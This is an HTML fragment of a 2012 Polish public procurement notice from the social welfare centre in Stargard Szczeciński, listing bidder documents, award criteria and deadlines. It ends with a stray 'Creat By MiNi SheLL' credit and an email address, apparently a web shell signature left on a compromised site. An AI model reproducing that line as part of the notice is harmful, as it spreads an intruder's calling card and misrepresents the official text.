<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>potwierdzoną za zgodność z oryginałem opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest  ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia .

Ocena zostanie dokonana przez Zamawiającego na podstawie złożonych przez wykonawców dokumentów i oświadczeń, według formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty określone w SIWZ m.in:
Wypełniony i podpisany formularz ofertowy z wykorzystaniem wzoru - załącznik nr 1  do SIWZ.
Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust.1 ustawy Prawo zamówień publicznych z wykorzystaniem wzoru - załącznik nr 2 do SIWZ.
Zaakceptowany przez wykonawcę, tj. podpisany projekt umowy - załącznik nr 4 do SIWZ.
Oświadczenie, że wykonawca nie zalega z opłacaniem podatków oraz  składek na ubezpieczenia zdrowotne i społeczne- załącznik nr 8.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana umowy może być dokonana w granicach wyznaczonych przepisami ustawy Prawo zamówień publicznych, w tym art. 144 ustawy, wyłącznie za zgodą stron, w formie pisemnej pod rygorem nieważności. 
2. Zmiany umowy mogą nastąpić w następujących przypadkach:
1)	zaistnienia omyłki pisarskiej lub rachunkowej,
2)	zaistnienia siły wyższej (powódź, pożar, zamieszki, strajki, ataki terrorystyczne, przerwy w dostawie energii elektrycznej) mającej wpływ na realizację umowy,
3)	zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy, w tym zmiany ustawowej stawki podatku VAT, jak również zmiany Wytycznych Instytucji Zarządzającej mającej wpływ na realizację umowy;  w przypadku zmiany ustawowej stawki podatku VAT kwota brutto wynagrodzenia Wykonawcy nie ulegnie zmianie,
4)	wystąpienia niezależnych od Zamawiającego i Wykonawcy istotnych okoliczności, o których Strony nie wiedziały przed zawarciem umowy, a które mają wpływ na terminy i sposób realizacji umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.stargard.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MIEJSKI OŚRODEK POMOCY SPOŁECZNEJ
ul. Warszawska 9A
73-110 Stargard Szczeciński.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.02.2012 godzina 12:00, miejsce: MIEJSKI OŚRODEK POMOCY SPOŁECZNEJ
ul. Warszawska 9A
73-110 Stargard Szczeciński
(sekretariat - pok.47).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wyjazd organizowany jest w ramach partnerskiego Projektu systemowego Integracja społeczna w powiecie stargardzkim współfinansowanego ze środków Unii Europejskiej w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII,  Działanie 7.1,  Poddziałanie 7.1.1..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com